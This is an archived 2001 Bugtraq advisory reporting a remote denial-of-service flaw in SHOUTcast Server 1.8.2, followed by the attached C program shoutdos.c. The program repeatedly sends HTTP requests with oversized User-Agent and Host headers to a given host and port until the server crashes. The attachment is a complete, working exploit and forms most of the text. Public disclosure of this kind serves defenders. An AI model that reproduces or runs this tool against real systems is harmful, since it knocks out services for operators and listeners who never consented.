6841915 2001-08-03 10:29 +0200 /49 rader/ FraMe <frame@hispalab.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-08-03 17:02 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18614>
Ärende: Denial of Service in SHOUTcast Server 1.8.2 Linux/w32/?
------------------------------------------------------------
Vendor : Nullsoft
Product : SHOUTcast Server 1.8.2 Linux/win32/?
Date : 01/08/2001
CONTENTS
1. Overview
2. Details
3. Systems.
4. Denial of Service
5. Vendor Response
1. Overview:
SHOUTcast Server is a streaming audio server. A "bad" client request
can crash the server.
2. Details
Server crash when get, seven
times ( aprox ), a very long buffer (4KB) in fields: User-Agent and
Host, in the client HTTP request.
3. Systems
- SHOUTcast Server 1.8.2 ( Linux )
- SHOUTcast Server 1.8.2 ( Win32 )
- SHOUTcast Server 1.8.2 ( Others ) ( No test )
4. DoS
The DoS in C format is attached.
5. Vendor Response
31/08/01: Sent problem to tom@nullsoft.com
03/08/01: No response from tom@nullsoft.com
Sent problem to bugtraq@securityfocus.com
=================================================
[ FraMe - frame@hispalab.com ]
[ Digital LiVe - http://frame.lifefromthenet.com ]
[ PGP Key - www.hispalab.com/frame/pgpkey.asc ]
[ Geek Code - www.hispalab.com/frame/geek.txt ]
=================================================
(6841915) /FraMe <frame@hispalab.com>/----(Ombruten)
Bilaga (application/octet-stream) i text 6841916
6841916 2001-08-03 10:29 +0200 /93 rader/ FraMe <frame@hispalab.com>
Bilagans filnamn: "shoutdos.c"
Importerad: 2001-08-03 17:02 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18615>
Bilaga (text/plain) till text 6841915
Ärende: Bilaga (shoutdos.c) till: Denial of Service in SHOUTcast Server 1.8.2 Linux/w32/?
------------------------------------------------------------
/*
* ShoutDoS: Remote Denial of Service SHOUTcast Server
*
* ShoutDoS (C) 2001 FraMe <frame@hispalab.com>
*
* Tested:
* SHOUTcast Server 1.8.2 Linux
* SHOUTcast Server 1.8.2 Win32
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/errno.h>
void msg(void) {
printf("ShoutDoS: Remote Denial of Service SHOUTcast Server\n");
printf("ShoutDoS (C) 2001 FraMe <frame@hispalab.com>\n");
}
int main(int argc,char **argv) {
int s,n=0,c;
struct sockaddr_in sa;
struct hostent *SHOUTserver;
char buffer[]="GET / HTTP/1.0\r\nUser-Agent:
SHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofService\r\nHost:
your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now\r\nAuthorization:
Basic\r\n\r\n"; char rbuff[512];
if ( argc != 3 ) {
msg();
printf("Usage: %s ip port\n",*argv);
exit(1);
}
if ((SHOUTserver = gethostbyname(argv[1])) == NULL) {
msg();
printf("Error: gethostbyname()\n");
exit(1);
}
memcpy(&sa.sin_addr.s_addr,SHOUTserver->h_addr,SHOUTserver->h_length);
sa.sin_family = AF_INET; sa.sin_port = htons(atoi(argv[2]));
if ((s=socket(PF_INET,SOCK_STREAM,0)) < 0 ) {
msg();
printf("Error: socket()\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
msg();
printf("Error: connect()\n");
exit (1);
}
close(s);
msg();
printf("Connect. The host appears be up...\n");
printf("Doing DoS ");
DoS:
if ((s=socket(PF_INET,SOCK_STREAM,0)) < 0 ) {
printf(" Error!\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
printf(" Server Crash!\n");
exit (1);
}
write(s,buffer,sizeof(buffer)-1);
read(s,rbuff,sizeof(rbuff));
close(s);
printf(".");
goto DoS; // Basic Power :)
}
/* EOF */
(6841916) /FraMe <frame@hispalab.com>/----(Ombruten)